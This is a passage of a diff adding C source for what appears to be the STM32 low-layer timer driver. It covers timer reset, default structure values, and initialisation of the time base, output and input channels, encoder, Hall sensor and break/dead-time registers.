LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_TIM5); + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_TIM5); + } +#endif /* TIM5 */ +#if defined(TIM6) + else if (TIMx == TIM6) + { + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_TIM6); + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_TIM6); + } +#endif /* TIM6 */ +#if defined (TIM7) + else if (TIMx == TIM7) + { + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_TIM7); + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_TIM7); + } +#endif /* TIM7 */ +#if defined(TIM8) + else if (TIMx == TIM8) + { + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_TIM8); + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_TIM8); + } +#endif /* TIM8 */ +#if defined(TIM9) + else if (TIMx == TIM9) + { + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_TIM9); + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_TIM9); + } +#endif /* TIM9 */ +#if defined(TIM10) + else if (TIMx == TIM10) + { + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_TIM10); + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_TIM10); + } +#endif /* TIM10 */ +#if defined(TIM11) + else if (TIMx == TIM11) + { + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_TIM11); + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_TIM11); + } +#endif /* TIM11 */ +#if defined(TIM12) + else if (TIMx == TIM12) + { + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_TIM12); + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_TIM12); + } +#endif /* TIM12 */ +#if defined(TIM13) + else if (TIMx == TIM13) + { + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_TIM13); + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_TIM13); + } +#endif /* TIM13 */ +#if defined(TIM14) + else if (TIMx == TIM14) + { + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_TIM14); + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_TIM14); + } +#endif /* TIM14 */ + else + { + result = ERROR; + } + + return result; +} + +/** + * @brief Set the fields of the time base unit configuration data structure + * to their default values. + * @param TIM_InitStruct pointer to a @ref LL_TIM_InitTypeDef structure (time base unit configuration data structure) + * @retval None + */ +void LL_TIM_StructInit(LL_TIM_InitTypeDef *TIM_InitStruct) +{ + /* Set the default configuration */ + TIM_InitStruct->Prescaler = (uint16_t)0x0000; + TIM_InitStruct->CounterMode = LL_TIM_COUNTERMODE_UP; + TIM_InitStruct->Autoreload = 0xFFFFFFFFU; + TIM_InitStruct->ClockDivision = LL_TIM_CLOCKDIVISION_DIV1; + TIM_InitStruct->RepetitionCounter = 0x00000000U; +} + +/** + * @brief Configure the TIMx time base unit. + * @param TIMx Timer Instance + * @param TIM_InitStruct pointer to a @ref LL_TIM_InitTypeDef structure + * (TIMx time base unit configuration data structure) + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx registers are de-initialized + * - ERROR: not applicable + */ +ErrorStatus LL_TIM_Init(TIM_TypeDef *TIMx, LL_TIM_InitTypeDef *TIM_InitStruct) +{ + uint32_t tmpcr1; + + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(TIMx)); + assert_param(IS_LL_TIM_COUNTERMODE(TIM_InitStruct->CounterMode)); + assert_param(IS_LL_TIM_CLOCKDIVISION(TIM_InitStruct->ClockDivision)); + + tmpcr1 = LL_TIM_ReadReg(TIMx, CR1); + + if (IS_TIM_COUNTER_MODE_SELECT_INSTANCE(TIMx)) + { + /* Select the Counter Mode */ + MODIFY_REG(tmpcr1, (TIM_CR1_DIR | TIM_CR1_CMS), TIM_InitStruct->CounterMode); + } + + if (IS_TIM_CLOCK_DIVISION_INSTANCE(TIMx)) + { + /* Set the clock division */ + MODIFY_REG(tmpcr1, TIM_CR1_CKD, TIM_InitStruct->ClockDivision); + } + + /* Write to TIMx CR1 */ + LL_TIM_WriteReg(TIMx, CR1, tmpcr1); + + /* Set the Autoreload value */ + LL_TIM_SetAutoReload(TIMx, TIM_InitStruct->Autoreload); + + /* Set the Prescaler value */ + LL_TIM_SetPrescaler(TIMx, TIM_InitStruct->Prescaler); + + if (IS_TIM_REPETITION_COUNTER_INSTANCE(TIMx)) + { + /* Set the Repetition Counter value */ + LL_TIM_SetRepetitionCounter(TIMx, TIM_InitStruct->RepetitionCounter); + } + + /* Generate an update event to reload the Prescaler + and the repetition counter value (if applicable) immediately */ + LL_TIM_GenerateEvent_UPDATE(TIMx); + + return SUCCESS; +} + +/** + * @brief Set the fields of the TIMx output channel configuration data + * structure to their default values. + * @param TIM_OC_InitStruct pointer to a @ref LL_TIM_OC_InitTypeDef structure + * (the output channel configuration data structure) + * @retval None + */ +void LL_TIM_OC_StructInit(LL_TIM_OC_InitTypeDef *TIM_OC_InitStruct) +{ + /* Set the default configuration */ + TIM_OC_InitStruct->OCMode = LL_TIM_OCMODE_FROZEN; + TIM_OC_InitStruct->OCState = LL_TIM_OCSTATE_DISABLE; + TIM_OC_InitStruct->OCNState = LL_TIM_OCSTATE_DISABLE; + TIM_OC_InitStruct->CompareValue = 0x00000000U; + TIM_OC_InitStruct->OCPolarity = LL_TIM_OCPOLARITY_HIGH; + TIM_OC_InitStruct->OCNPolarity = LL_TIM_OCPOLARITY_HIGH; + TIM_OC_InitStruct->OCIdleState = LL_TIM_OCIDLESTATE_LOW; + TIM_OC_InitStruct->OCNIdleState = LL_TIM_OCIDLESTATE_LOW; +} + +/** + * @brief Configure the TIMx output channel. + * @param TIMx Timer Instance + * @param Channel This parameter can be one of the following values: + * @arg @ref LL_TIM_CHANNEL_CH1 + * @arg @ref LL_TIM_CHANNEL_CH2 + * @arg @ref LL_TIM_CHANNEL_CH3 + * @arg @ref LL_TIM_CHANNEL_CH4 + * @param TIM_OC_InitStruct pointer to a @ref LL_TIM_OC_InitTypeDef structure (TIMx output channel configuration + * data structure) + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx output channel is initialized + * - ERROR: TIMx output channel is not initialized + */ +ErrorStatus LL_TIM_OC_Init(TIM_TypeDef *TIMx, uint32_t Channel, LL_TIM_OC_InitTypeDef *TIM_OC_InitStruct) +{ + ErrorStatus result = ERROR; + + switch (Channel) + { + case LL_TIM_CHANNEL_CH1: + result = OC1Config(TIMx, TIM_OC_InitStruct); + break; + case LL_TIM_CHANNEL_CH2: + result = OC2Config(TIMx, TIM_OC_InitStruct); + break; + case LL_TIM_CHANNEL_CH3: + result = OC3Config(TIMx, TIM_OC_InitStruct); + break; + case LL_TIM_CHANNEL_CH4: + result = OC4Config(TIMx, TIM_OC_InitStruct); + break; + default: + break; + } + + return result; +} + +/** + * @brief Set the fields of the TIMx input channel configuration data + * structure to their default values. + * @param TIM_ICInitStruct pointer to a @ref LL_TIM_IC_InitTypeDef structure (the input channel configuration + * data structure) + * @retval None + */ +void LL_TIM_IC_StructInit(LL_TIM_IC_InitTypeDef *TIM_ICInitStruct) +{ + /* Set the default configuration */ + TIM_ICInitStruct->ICPolarity = LL_TIM_IC_POLARITY_RISING; + TIM_ICInitStruct->ICActiveInput = LL_TIM_ACTIVEINPUT_DIRECTTI; + TIM_ICInitStruct->ICPrescaler = LL_TIM_ICPSC_DIV1; + TIM_ICInitStruct->ICFilter = LL_TIM_IC_FILTER_FDIV1; +} + +/** + * @brief Configure the TIMx input channel. + * @param TIMx Timer Instance + * @param Channel This parameter can be one of the following values: + * @arg @ref LL_TIM_CHANNEL_CH1 + * @arg @ref LL_TIM_CHANNEL_CH2 + * @arg @ref LL_TIM_CHANNEL_CH3 + * @arg @ref LL_TIM_CHANNEL_CH4 + * @param TIM_IC_InitStruct pointer to a @ref LL_TIM_IC_InitTypeDef structure (TIMx input channel configuration data + * structure) + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx output channel is initialized + * - ERROR: TIMx output channel is not initialized + */ +ErrorStatus LL_TIM_IC_Init(TIM_TypeDef *TIMx, uint32_t Channel, LL_TIM_IC_InitTypeDef *TIM_IC_InitStruct) +{ + ErrorStatus result = ERROR; + + switch (Channel) + { + case LL_TIM_CHANNEL_CH1: + result = IC1Config(TIMx, TIM_IC_InitStruct); + break; + case LL_TIM_CHANNEL_CH2: + result = IC2Config(TIMx, TIM_IC_InitStruct); + break; + case LL_TIM_CHANNEL_CH3: + result = IC3Config(TIMx, TIM_IC_InitStruct); + break; + case LL_TIM_CHANNEL_CH4: + result = IC4Config(TIMx, TIM_IC_InitStruct); + break; + default: + break; + } + + return result; +} + +/** + * @brief Fills each TIM_EncoderInitStruct field with its default value + * @param TIM_EncoderInitStruct pointer to a @ref LL_TIM_ENCODER_InitTypeDef structure (encoder interface + * configuration data structure) + * @retval None + */ +void LL_TIM_ENCODER_StructInit(LL_TIM_ENCODER_InitTypeDef *TIM_EncoderInitStruct) +{ + /* Set the default configuration */ + TIM_EncoderInitStruct->EncoderMode = LL_TIM_ENCODERMODE_X2_TI1; + TIM_EncoderInitStruct->IC1Polarity = LL_TIM_IC_POLARITY_RISING; + TIM_EncoderInitStruct->IC1ActiveInput = LL_TIM_ACTIVEINPUT_DIRECTTI; + TIM_EncoderInitStruct->IC1Prescaler = LL_TIM_ICPSC_DIV1; + TIM_EncoderInitStruct->IC1Filter = LL_TIM_IC_FILTER_FDIV1; + TIM_EncoderInitStruct->IC2Polarity = LL_TIM_IC_POLARITY_RISING; + TIM_EncoderInitStruct->IC2ActiveInput = LL_TIM_ACTIVEINPUT_DIRECTTI; + TIM_EncoderInitStruct->IC2Prescaler = LL_TIM_ICPSC_DIV1; + TIM_EncoderInitStruct->IC2Filter = LL_TIM_IC_FILTER_FDIV1; +} + +/** + * @brief Configure the encoder interface of the timer instance. + * @param TIMx Timer Instance + * @param TIM_EncoderInitStruct pointer to a @ref LL_TIM_ENCODER_InitTypeDef structure (TIMx encoder interface + * configuration data structure) + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx registers are de-initialized + * - ERROR: not applicable + */ +ErrorStatus LL_TIM_ENCODER_Init(TIM_TypeDef *TIMx, LL_TIM_ENCODER_InitTypeDef *TIM_EncoderInitStruct) +{ + uint32_t tmpccmr1; + uint32_t tmpccer; + + /* Check the parameters */ + assert_param(IS_TIM_ENCODER_INTERFACE_INSTANCE(TIMx)); + assert_param(IS_LL_TIM_ENCODERMODE(TIM_EncoderInitStruct->EncoderMode)); + assert_param(IS_LL_TIM_IC_POLARITY_ENCODER(TIM_EncoderInitStruct->IC1Polarity)); + assert_param(IS_LL_TIM_ACTIVEINPUT(TIM_EncoderInitStruct->IC1ActiveInput)); + assert_param(IS_LL_TIM_ICPSC(TIM_EncoderInitStruct->IC1Prescaler)); + assert_param(IS_LL_TIM_IC_FILTER(TIM_EncoderInitStruct->IC1Filter)); + assert_param(IS_LL_TIM_IC_POLARITY_ENCODER(TIM_EncoderInitStruct->IC2Polarity)); + assert_param(IS_LL_TIM_ACTIVEINPUT(TIM_EncoderInitStruct->IC2ActiveInput)); + assert_param(IS_LL_TIM_ICPSC(TIM_EncoderInitStruct->IC2Prescaler)); + assert_param(IS_LL_TIM_IC_FILTER(TIM_EncoderInitStruct->IC2Filter)); + + /* Disable the CC1 and CC2: Reset the CC1E and CC2E Bits */ + TIMx->CCER &= (uint32_t)~(TIM_CCER_CC1E | TIM_CCER_CC2E); + + /* Get the TIMx CCMR1 register value */ + tmpccmr1 = LL_TIM_ReadReg(TIMx, CCMR1); + + /* Get the TIMx CCER register value */ + tmpccer = LL_TIM_ReadReg(TIMx, CCER); + + /* Configure TI1 */ + tmpccmr1 &= (uint32_t)~(TIM_CCMR1_CC1S | TIM_CCMR1_IC1F | TIM_CCMR1_IC1PSC); + tmpccmr1 |= (uint32_t)(TIM_EncoderInitStruct->IC1ActiveInput >> 16U); + tmpccmr1 |= (uint32_t)(TIM_EncoderInitStruct->IC1Filter >> 16U); + tmpccmr1 |= (uint32_t)(TIM_EncoderInitStruct->IC1Prescaler >> 16U); + + /* Configure TI2 */ + tmpccmr1 &= (uint32_t)~(TIM_CCMR1_CC2S | TIM_CCMR1_IC2F | TIM_CCMR1_IC2PSC); + tmpccmr1 |= (uint32_t)(TIM_EncoderInitStruct->IC2ActiveInput >> 8U); + tmpccmr1 |= (uint32_t)(TIM_EncoderInitStruct->IC2Filter >> 8U); + tmpccmr1 |= (uint32_t)(TIM_EncoderInitStruct->IC2Prescaler >> 8U); + + /* Set TI1 and TI2 polarity and enable TI1 and TI2 */ + tmpccer &= (uint32_t)~(TIM_CCER_CC1P | TIM_CCER_CC1NP | TIM_CCER_CC2P | TIM_CCER_CC2NP); + tmpccer |= (uint32_t)(TIM_EncoderInitStruct->IC1Polarity); + tmpccer |= (uint32_t)(TIM_EncoderInitStruct->IC2Polarity << 4U); + tmpccer |= (uint32_t)(TIM_CCER_CC1E | TIM_CCER_CC2E); + + /* Set encoder mode */ + LL_TIM_SetEncoderMode(TIMx, TIM_EncoderInitStruct->EncoderMode); + + /* Write to TIMx CCMR1 */ + LL_TIM_WriteReg(TIMx, CCMR1, tmpccmr1); + + /* Write to TIMx CCER */ + LL_TIM_WriteReg(TIMx, CCER, tmpccer); + + return SUCCESS; +} + +/** + * @brief Set the fields of the TIMx Hall sensor interface configuration data + * structure to their default values. + * @param TIM_HallSensorInitStruct pointer to a @ref LL_TIM_HALLSENSOR_InitTypeDef structure (HALL sensor interface + * configuration data structure) + * @retval None + */ +void LL_TIM_HALLSENSOR_StructInit(LL_TIM_HALLSENSOR_InitTypeDef *TIM_HallSensorInitStruct) +{ + /* Set the default configuration */ + TIM_HallSensorInitStruct->IC1Polarity = LL_TIM_IC_POLARITY_RISING; + TIM_HallSensorInitStruct->IC1Prescaler = LL_TIM_ICPSC_DIV1; + TIM_HallSensorInitStruct->IC1Filter = LL_TIM_IC_FILTER_FDIV1; + TIM_HallSensorInitStruct->CommutationDelay = 0U; +} + +/** + * @brief Configure the Hall sensor interface of the timer instance. + * @note TIMx CH1, CH2 and CH3 inputs connected through a XOR + * to the TI1 input channel + * @note TIMx slave mode controller is configured in reset mode. + Selected internal trigger is TI1F_ED. + * @note Channel 1 is configured as input, IC1 is mapped on TRC. + * @note Captured value stored in TIMx_CCR1 correspond to the time elapsed + * between 2 changes on the inputs. It gives information about motor speed. + * @note Channel 2 is configured in output PWM 2 mode. + * @note Compare value stored in TIMx_CCR2 corresponds to the commutation delay. + * @note OC2REF is selected as trigger output on TRGO. + * @note LL_TIM_IC_POLARITY_BOTHEDGE must not be used for TI1 when it is used + * when TIMx operates in Hall sensor interface mode. + * @param TIMx Timer Instance + * @param TIM_HallSensorInitStruct pointer to a @ref LL_TIM_HALLSENSOR_InitTypeDef structure (TIMx HALL sensor + * interface configuration data structure) + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx registers are de-initialized + * - ERROR: not applicable + */ +ErrorStatus LL_TIM_HALLSENSOR_Init(TIM_TypeDef *TIMx, LL_TIM_HALLSENSOR_InitTypeDef *TIM_HallSensorInitStruct) +{ + uint32_t tmpcr2; + uint32_t tmpccmr1; + uint32_t tmpccer; + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_HALL_SENSOR_INTERFACE_INSTANCE(TIMx)); + assert_param(IS_LL_TIM_IC_POLARITY_ENCODER(TIM_HallSensorInitStruct->IC1Polarity)); + assert_param(IS_LL_TIM_ICPSC(TIM_HallSensorInitStruct->IC1Prescaler)); + assert_param(IS_LL_TIM_IC_FILTER(TIM_HallSensorInitStruct->IC1Filter)); + + /* Disable the CC1 and CC2: Reset the CC1E and CC2E Bits */ + TIMx->CCER &= (uint32_t)~(TIM_CCER_CC1E | TIM_CCER_CC2E); + + /* Get the TIMx CR2 register value */ + tmpcr2 = LL_TIM_ReadReg(TIMx, CR2); + + /* Get the TIMx CCMR1 register value */ + tmpccmr1 = LL_TIM_ReadReg(TIMx, CCMR1); + + /* Get the TIMx CCER register value */ + tmpccer = LL_TIM_ReadReg(TIMx, CCER); + + /* Get the TIMx SMCR register value */ + tmpsmcr = LL_TIM_ReadReg(TIMx, SMCR); + + /* Connect TIMx_CH1, CH2 and CH3 pins to the TI1 input */ + tmpcr2 |= TIM_CR2_TI1S; + + /* OC2REF signal is used as trigger output (TRGO) */ + tmpcr2 |= LL_TIM_TRGO_OC2REF; + + /* Configure the slave mode controller */ + tmpsmcr &= (uint32_t)~(TIM_SMCR_TS | TIM_SMCR_SMS); + tmpsmcr |= LL_TIM_TS_TI1F_ED; + tmpsmcr |= LL_TIM_SLAVEMODE_RESET; + + /* Configure input channel 1 */ + tmpccmr1 &= (uint32_t)~(TIM_CCMR1_CC1S | TIM_CCMR1_IC1F | TIM_CCMR1_IC1PSC); + tmpccmr1 |= (uint32_t)(LL_TIM_ACTIVEINPUT_TRC >> 16U); + tmpccmr1 |= (uint32_t)(TIM_HallSensorInitStruct->IC1Filter >> 16U); + tmpccmr1 |= (uint32_t)(TIM_HallSensorInitStruct->IC1Prescaler >> 16U); + + /* Configure input channel 2 */ + tmpccmr1 &= (uint32_t)~(TIM_CCMR1_OC2M | TIM_CCMR1_OC2FE | TIM_CCMR1_OC2PE | TIM_CCMR1_OC2CE); + tmpccmr1 |= (uint32_t)(LL_TIM_OCMODE_PWM2 << 8U); + + /* Set Channel 1 polarity and enable Channel 1 and Channel2 */ + tmpccer &= (uint32_t)~(TIM_CCER_CC1P | TIM_CCER_CC1NP | TIM_CCER_CC2P | TIM_CCER_CC2NP); + tmpccer |= (uint32_t)(TIM_HallSensorInitStruct->IC1Polarity); + tmpccer |= (uint32_t)(TIM_CCER_CC1E | TIM_CCER_CC2E); + + /* Write to TIMx CR2 */ + LL_TIM_WriteReg(TIMx, CR2, tmpcr2); + + /* Write to TIMx SMCR */ + LL_TIM_WriteReg(TIMx, SMCR, tmpsmcr); + + /* Write to TIMx CCMR1 */ + LL_TIM_WriteReg(TIMx, CCMR1, tmpccmr1); + + /* Write to TIMx CCER */ + LL_TIM_WriteReg(TIMx, CCER, tmpccer); + + /* Write to TIMx CCR2 */ + LL_TIM_OC_SetCompareCH2(TIMx, TIM_HallSensorInitStruct->CommutationDelay); + + return SUCCESS; +} + +/** + * @brief Set the fields of the Break and Dead Time configuration data structure + * to their default values. + * @param TIM_BDTRInitStruct pointer to a @ref LL_TIM_BDTR_InitTypeDef structure (Break and Dead Time configuration + * data structure) + * @retval None + */ +void LL_TIM_BDTR_StructInit(LL_TIM_BDTR_InitTypeDef *TIM_BDTRInitStruct) +{ + /* Set the default configuration */ + TIM_BDTRInitStruct->OSSRState = LL_TIM_OSSR_DISABLE; + TIM_BDTRInitStruct->OSSIState = LL_TIM_OSSI_DISABLE; + TIM_BDTRInitStruct->LockLevel = LL_TIM_LOCKLEVEL_OFF; + TIM_BDTRInitStruct->DeadTime = (uint8_t)0x00; + TIM_BDTRInitStruct->BreakState = LL_TIM_BREAK_DISABLE; + TIM_BDTRInitStruct->BreakPolarity = LL_TIM_BREAK_POLARITY_LOW; + TIM_BDTRInitStruct->AutomaticOutput = LL_TIM_AUTOMATICOUTPUT_DISABLE; +} + +/** + * @brief Configure the Break and Dead Time feature of the timer instance. + * @note As the bits AOE, BKP, BKE, OSSR, OSSI and DTG[7:0] can be write-locked + * depending on the LOCK configuration, it can be necessary to configure all of + * them during the first write access to the TIMx_BDTR register. + * @note Macro IS_TIM_BREAK_INSTANCE(TIMx) can be used to check whether or not + * a timer instance provides a break input. + * @param TIMx Timer Instance + * @param TIM_BDTRInitStruct pointer to a @ref LL_TIM_BDTR_InitTypeDef structure (Break and Dead Time configuration + * data structure) + * @retval An ErrorStatus enumeration value: + * - SUCCESS: Break and Dead Time is initialized + * - ERROR: not applicable + */ +ErrorStatus LL_TIM_BDTR_Init(TIM_TypeDef *TIMx, LL_TIM_BDTR_InitTypeDef *TIM_BDTRInitStruct) +{ + uint32_t tmpbdtr = 0; + + /* Check the parameters */ + assert_param(IS_TIM_BREAK_INSTANCE(TIMx)); + assert_param(IS_LL_TIM_OSSR_STATE(TIM_BDTRInitStruct->OSSRState)); + assert_param(IS_LL_TIM_OSSI_STATE(TIM_BDTRInitStruct->OSSIState)); + assert_param(IS_LL_TIM_LOCK_LEVEL(TIM_BDTRInitStruct->LockLevel)); + assert_param(IS_LL_TIM_BREAK_STATE(TIM_BDTRInitStruct->BreakState)); + assert_param(IS_LL_TIM_BREAK_POLARITY(TIM_BDTRInitStruct->BreakPolarity)); + assert_param(IS_LL_TIM_AUTOMATIC_OUTPUT_STATE(TIM_BDTRInitStruct->AutomaticOutput)); + + /* Set the Lock level, the Break enable Bit and the Polarity, the OSSR State, + the OSSI State, the dead time value and the Automatic Output Enable Bit */ + + /* Set the BDTR bits */ + MODIFY_REG(tmpbdtr, TIM_BDTR_DTG, TIM_BDTRInitStruct->DeadTime); + MODIFY_REG(tmpbdtr, TIM_BDTR_LOCK, TIM_BDTRInitStruct->LockLevel); + MODIFY_REG(tmpbdtr, TIM_BDTR_OSSI, TIM_BDTRInitStruct->OSSIState); + MODIFY_REG(tmpbdtr, TIM_BDTR_OSSR, TIM_BDTRInitStruct->OSSRState); + MODIFY_REG(tmpbdtr, TIM_BDTR_BKE, TIM_BDTRInitStruct->BreakState); + MODIFY_REG(tmpbdtr, TIM_BDTR_BKP, TIM_BDTRInitStruct->BreakPolarity); + MODIFY_REG(tmpbdtr, TIM_BDTR_AOE, TIM_BDTRInitStruct->AutomaticOutput); + MODIFY_REG(tmpbdtr, TIM_BDTR_MOE, TIM_BDTRInitStruct->AutomaticOutput); + + /* Set TIMx_BDTR */ + LL_TIM_WriteReg(TIMx, BDTR, tmpbdtr); + + return SUCCESS; +} +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup TIM_LL_Private_Functions TIM Private Functions + * @brief Private functions + * @{ + */ +/** + * @brief Configure the TIMx output channel 1. + * @param TIMx Timer Instance + * @param TIM_OCInitStruct pointer to the the TIMx output channel 1 configuration data structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx registers are de-initialized + * - ERROR: not applicable + */ +static ErrorStatus OC1Config(TIM_TypeDef *TIMx, LL_TIM_OC_InitTypeDef *TIM_OCInitStruct) +{ + uint32_t tmpccmr1; + uint32_t tmpccer; + uint32_t tmpcr2; + + /* Check the parameters */ + assert_param(IS_TIM_CC1_INSTANCE(TIMx)); + assert_param(IS_LL_TIM_OCMODE(TIM_OCInitStruct->OCMode)); + assert_param(IS_LL_TIM_OCSTATE(TIM_OCInitStruct->OCState)); + assert_param(IS_LL_TIM_OCPOLARITY(TIM_OCInitStruct->OCPolarity)); + assert_param(IS_LL_TIM_OCSTATE(TIM_OCInitStruct->OCNState)); + assert_param(IS_LL_TIM_OCPOLARITY(TIM_OCInitStruct->OCNPolarity)); + + /* Disable the Channel 1: Reset the CC1E Bit */ + CLEAR_BIT(TIMx->CCER, TIM_CCER_CC1E); + + /* Get the TIMx CCER register value */ + tmpccer = LL_TIM_ReadReg(TIMx, CCER); + + /* Get the TIMx CR2 register value */ + tmpcr2 = LL_TIM_ReadReg(TIMx, CR2); + + /* Get the TIMx CCMR1 register value */ + tmpccmr1 = LL_TIM_ReadReg(TIMx, CCMR1); + + /* Reset Capture/Compare selection Bits */ + CLEAR_BIT(tmpccmr1, TIM_CCMR1_CC1S); + + /* Set the Output Compare Mode */ + MODIFY_REG(tmpccmr1, TIM_CCMR1_OC1M, TIM_OCInitStruct->OCMode); + + /* Set the Output Compare Polarity */ + MODIFY_REG(tmpccer, TIM_CCER_CC1P, TIM_OCInitStruct->OCPolarity); + + /* Set the Output State */ + MODIFY_REG(tmpccer, TIM_CCER_CC1E, TIM_OCInitStruct->OCState); + + if (IS_TIM_BREAK_INSTANCE(TIMx)) + { + assert_param(IS_LL_TIM_OCIDLESTATE(TIM_OCInitStruct->OCNIdleState)); + assert_param(IS_LL_TIM_OCIDLESTATE(TIM_OCInitStruct->OCIdleState)); + + /* Set the complementary output Polarity */ + MODIFY_REG(tmpccer, TIM_CCER_CC1NP, TIM_OCInitStruct->OCNPolarity << 2U); + + /* Set the complementary output State */ + MODIFY_REG(tmpccer, TIM_CCER_CC1NE, TIM_OCInitStruct->OCNState << 2U); + + /* Set the Output Idle state */ + MODIFY_REG(tmpcr2, TIM_CR2_OIS1, TIM_OCInitStruct->OCIdleState); + + /* Set the complementary output Idle state */ + MODIFY_REG(tmpcr2, TIM_CR2_OIS1N, TIM_OCInitStruct->OCNIdleState << 1U); + } + + /* Write to TIMx CR2 */ + LL_TIM_WriteReg(TIMx, CR2, tmpcr2); + + /* Write to TIMx CCMR1 */ + LL_TIM_WriteReg(TIMx, CCMR1, tmpccmr1); + + /* Set the Capture Compare Register value */ + LL_TIM_OC_SetCompareCH1(TIMx, TIM_OCInitStruct->CompareValue); + + /* Write to TIMx CCER */ + LL_TIM_WriteReg(TIMx, CCER, tmpccer); + + return SUCCESS; +} + +/** + * @brief Configure the TIMx output channel 2. + * @param TIMx Timer Instance + * @param TIM_OCInitStruct pointer to the the TIMx output channel 2 configuration data structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx registers are de-initialized + * - ERROR: not applicable + */ +static ErrorStatus OC2Config(TIM_TypeDef *TIMx, LL_TIM_OC_InitTypeDef *TIM_OCInitStruct) +{ + uint32_t tmpccmr1; + uint32_t tmpccer; + uint32_t tmpcr2; + + /* Check the parameters */ + assert_param(IS_TIM_CC2_INSTANCE(TIMx)); + assert_param(IS_LL_TIM_OCMODE(TIM_OCInitStruct->OCMode)); + assert_param(IS_LL_TIM_OCSTATE(TIM_OCInitStruct->OCState)); + assert_param(IS_LL_TIM_OCPOLARITY(TIM_OCInitStruct->OCPolarity)); + assert_param(IS_LL_TIM_OCSTATE(TIM_OCInitStruct->OCNState)); + assert_param(IS_LL_TIM_OCPOLARITY(TIM_OCInitStruct->OCNPolarity)); + + /* Disable the Channel 2: Reset the CC2E Bit */ + CLEAR_BIT(TIMx->CCER, TIM_CCER_CC2E); + + /* Get the TIMx CCER register value */ + tmpccer = LL_TIM_ReadReg(TIMx, CCER); + + /* Get the TIMx CR2 register value */ + tmpcr2 = LL_TIM_ReadReg(TIMx, CR2); + + /* Get the TIMx CCMR1 register value */ + tmpccmr1 = LL_TIM_ReadReg(TIMx, CCMR1); + + /* Reset Capture/Compare selection Bits */ + CLEAR_BIT(tmpccmr1, TIM_CCMR1_CC2S); + + /* Select the Output Compare Mode */ + MODIFY_REG(tmpccmr1, TIM_CCMR1_OC2M, TIM_OCInitStruct->OCMode << 8U); + + /* Set the Output Compare Polarity */ + MODIFY_REG(tmpccer, TIM_CCER_CC2P, TIM_OCInitStruct->OCPolarity << 4U); + + /* Set the Output State */ + MODIFY_REG(tmpccer, TIM_CCER_CC2E, TIM_OCInitStruct->OCState << 4U); + + if (IS_TIM_BREAK_INSTANCE(TIMx)) + { + assert_param(IS_LL_TIM_OCIDLESTATE(TIM_OCInitStruct->OCNIdleState)); + assert_param(IS_LL_TIM_OCIDLESTATE(TIM_OCInitStruct->OCIdleState)); + + /* Set the complementary output Polarity */ + MODIFY_REG(tmpccer, TIM_CCER_CC2NP, TIM_OCInitStruct->OCNPolarity << 6U); + + /* Set the complementary output State */ + MODIFY_REG(tmpccer, TIM_CCER_CC2NE, TIM_OCInitStruct->OCNState << 6U); + + /* Set the Output Idle state */ + MODIFY_REG(tmpcr2, TIM_CR2_OIS2, TIM_OCInitStruct->OCIdleState << 2U); + + /* Set the complementary output Idle state */ + MODIFY_REG(tmpcr2, TIM_CR2_OIS2N, TIM_OCInitStruct->OCNIdleState << 3U); + } + + /* Write to TIMx CR2 */ + LL_TIM_WriteReg(TIMx, CR2, tmpcr2); + + /* Write to TIMx CCMR1 */ + LL_TIM_WriteReg(TIMx, CCMR1, tmpccmr1); + + /* Set the Capture Compare Register value */ + LL_TIM_OC_SetCompareCH2(TIMx, TIM_OCInitStruct->CompareValue); + + /* Write to TIMx CCER */ + LL_TIM_WriteReg(TIMx, CCER, tmpccer); + + return SUCCESS; +} + +/** + * @brief Configure the TIMx output channel 3. + * @param TIMx Timer Instance + * @param TIM_OCInitStruct pointer to the the TIMx output channel 3 configuration data structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx registers are de-initialized + * - ERROR: not applicable + */ +static ErrorStatus OC3Config(TIM_TypeDef *TIMx, LL_TIM_OC_InitTypeDef *TIM_OCInitStruct) +{ + uint32_t tmpccmr2; + uint32_t tmpccer; + uint32_t tmpcr2; + + /* Check the parameters */ + assert_param(IS_TIM_CC3_INSTANCE(TIMx)); + assert_param(IS_LL_TIM_OCMODE(TIM_OCInitStruct->OCMode)); + assert_param(IS_LL_TIM_OCSTATE(TIM_OCInitStruct->OCState)); + assert_param(IS_LL_TIM_OCPOLARITY(TIM_OCInitStruct->OCPolarity)); + assert_param(IS_LL_TIM_OCSTATE(TIM_OCInitStruct->OCNState)); + assert_param(IS_LL_TIM_OCPOLARITY(TIM_OCInitStruct->OCNPolarity)); + + /* Disable the Channel 3: Reset the CC3E Bit */ + CLEAR_BIT(TIMx->CCER, TIM_CCER_CC3E); + + /* Get the TIMx CCER register value */ + tmpccer = LL_TIM_ReadReg(TIMx, CCER); + + /* Get the TIMx CR2 register value */ + tmpcr2 = LL_TIM_ReadReg(TIMx, CR2); + + /* Get the TIMx CCMR2 register value */ + 